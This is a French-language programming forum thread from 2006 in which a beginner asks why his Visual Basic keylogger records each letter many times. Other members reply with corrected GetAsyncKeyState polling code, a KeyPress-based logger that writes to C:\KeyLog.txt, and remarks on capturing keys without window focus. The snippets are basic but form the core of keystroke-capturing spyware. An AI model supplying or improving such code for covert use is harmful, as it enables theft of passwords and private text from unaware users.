Vous ne trouvez pas de réponse à votre problème ? Alors posez la question dans le forum. Souvenez-vous qu'il n'y a jamais de question bête, mais rester dans l'ignorance parce que l'on n'ose pas poser une question, ça c'est une erreur !

Sujet : Api GetAsyncKeyState et GetKeyState [ Divers / Débutants ] (moi4975)

samedi 1 juillet 2006 à 20:59:15 | Api GetAsyncKeyState et GetKeyState

moi4975

Bonsoir à tous,

J'essaye de développer un Keylog grace au Api  GetAsyncKeyState et GetKeyState ! Il fonctionne correctement apart une problème que je n'arrive pas à solutionner ! Si je tape une fois la touche ' a ' il me renvoie cette chaine "aaaaaaaaa" et ça pour toute les lettres ! Qqun a-t'il une idee pour résoudre ce problème ? merci

Voila une partie de mon code :

Public Function Demarrer() As
IntegerY =1
Do While Y = 1
Application.DoEvents()
Clavier
Loop
End Function

Private Sub Clavier()
   Dim x As Integer

For

x = 65 To 90

If (GetKeyState(x) < 0) Then

Application.DoEvents()

I  f (GetKeyState(10) < 0) then

Texte = Texte & chr(x)

Else

Texte = Texte & chr(x + 32)

End if

End If

Next

End Sub

dimanche 2 juillet 2006 à 00:57:35 | Re : Api GetAsyncKeyState et GetKeyState

TroXsA

tu sais y pas besoin d'API pour faire ce genre de programme !
il y a les evenements dans l'environnement
personnelement peux te faire un keyloger en 5 lignes de code et sans API !

[ Lien ]
Le site qui ne parle qu'un seul langage, visual basic 2005

dimanche 2 juillet 2006 à 01:17:30 | Re : Api GetAsyncKeyState et GetKeyState

PCPT

Administrateur CodeS-SourceS
commentaire au moins aussi constructif que celui-ci.....

Prenez un instant pour répondre à ce sondage svp

dimanche 2 juillet 2006 à 03:36:08 | Re : Api GetAsyncKeyState et GetKeyState

Renfield

Réponse acceptée !

En gros, il est passé pas mal de fois dans ta boucle alors que tu avait encore le doight appuuyé sur ta touche 'A'

regarde dans la doc, tu trouveras ta réponse...

Private Sub Clavier()
Dim x As Integer
    For x = 65 To 90
        If GetAsyncKeyState(x) And 1 Then
            Texte = Texte & Chr(x)
        End If
    Next
End Sub

Renfield
Admin CodeS-SourceS- MVP Visual Basic

dimanche 2 juillet 2006 à 10:28:45 | Re : Api GetAsyncKeyState et GetKeyState

TroXsA

Vodila ! l'idée est la maintenant a toi de géré les evenement comme il faut, j'ai testé et il te log bien tout comme il faut, sauf les touche special de type F1 F2 F3 .... ENTER ... il faut un peux plus de code pour arriver a ce genre de chose ...

mais pas besion d'API

Public
Sub KeyLog( ByVal Ev As String
)

Dim KeyWrite As New StreamWriter( "C:\KeyLog.txt" , True )

KeyWrite.Write(Ev)

KeyWrite.Close()

End Sub

Private Sub Form1_KeyPress( ByVal sender As Object , ByVal e As System.Windows.Forms.KeyPressEventArgs) Handles Me .KeyPress

KeyLog(e.KeyChar)

End Sub

[ Lien ]

dimanche 2 juillet 2006 à 11:33:00 | Re : Api GetAsyncKeyState et GetKeyState

Renfield

TroXsA... ton truc est bien joli, mais il faut que la Form1 aies le Focus ^^

d'ou l'utilisation d'API, pour connaitre l'etat du clavier n'importe quand...

Renfield
Admin CodeS-SourceS- MVP Visual Basic

dimanche 2 juillet 2006 à 19:10:27 | Re : Api GetAsyncKeyState et GetKeyState

TroXsA

Oui mais y a moyen qui traite les donnés sans avoir le focus il me semble !
je suis sur que ça doit etre possible

[ Lien ]

Cette discussion est classé dans : end, texte, api, getasynckeystate, getkeystate

Répondre à ce message

Sujets en rapport avec ce message

Recherche API pour écrire texte sur ecran [ par GG83260 ] Je souhaite pouvoir ecire une chaine de caractere sur l'ecran à un endroit définit.Cela peut passer par n'importe quel méthode(tant que l'on m'expliqu recuperer un champ de formulaire d'access [ par Cecile29 ] voila g le code vba sous access suivant ki est associé a un formulaire ki contient entre otre les champs suivant : Longitude(zone detexte) et Long_Dir recuperer un champ de formulaire [ par Cecile29 ] voila g le code vba access suivant ki est associé a un formulaire ki contient les champs suivants : Longitude(zone detexte) et Long_Dir (zone de liste API ET TEXTE [ par stefsoft ] je dessine par les API un texte avec Drawtext , et je voudrais connaitre la longueur en pixels de ma chaine de caractère pour fixer la longueur de mon GetAsyncKeyState [ par nycou ] Bonjour !J'ai la connaissance d'une api avec laquelle on peut savoir si une touche du clavier est pressée ou non. Je sais qu'il existe plusieurs api q PB redim par API d'une richtextbox(elle meme créee par API) en fonction de la hauteur de mon texte en multiligne lors d'un resize du usercontrol [ par liquide ] bonjour ,j'ai piti pb (enorme meme) avec une richtextbox créée par api (createwindowex), je souhaiterais redimmensionner cette richtextbox en fonction Changer la couleur d'un texte écrit par l'API DrawText ? [ par azerty25 ] Lu allLa question est dans le titre, un texte dessiné avec cette API et par défaut noir et j'ai pas trouvé comment la changer :(== @Z3RtY25 == Soucis avec l'API pour impression rotative de text [ par PROGRAMMIX ] Ne sachant si ma précédente question a été lue ou non et n'ayant eu aucune remarque, je reposte ma question une nouvelle fois.------------------------ Afficher un texte mot à mot [ par Hyx ] LU all :)Voila j'aimerai afficher un groupe de texte mais de facon individuelmais je n'arrive pas a afficher plus de 2 phrasesDim word As IntegerPriva Glisser un fichier [ par Sparks_hevs ] Bonjours,Quelqu'un pourrait il me donner la solution pour quand je glisse un fichier texte sur l'icone de mon programme celui si me l'ouvre dans une t

Nos sponsors

Sondage...

CalendriCode

Juillet 2009
LMMJVSD
  12345
6789101112
13141516171819
20212223242526
2728293031  

Consulter la suite du CalendriCode

Téléchargements

Comparez les prix Nouvelle version

Photothèque Nouveau !

Développement réalisé par Nicolas SOREL (Nix) avec l'aide de : Cyril DURAND et Emmanuel (EBArtSoft), Merci à Vincent pour ses précieux conseils
CodeS-SourceS.com© Toute reproduction même partielle est interdite sauf accord écrit du Webmaster
CodeS-SourceS.com© est une marque déposée tous droits réservés
Temps d'éxécution de la page : 1,076 sec

Google Coop CodeS-SourceS Google Coop CodeS-SourceS

Certaines images présentes sur le site (notament certains avatars) sont issues des collections IconShock, donc si vous souhaitez utiliser ces icons vous devez les acheter, ne les copiez pas et ne utilisez pas dans vos sites et applications sans les avoir commandé.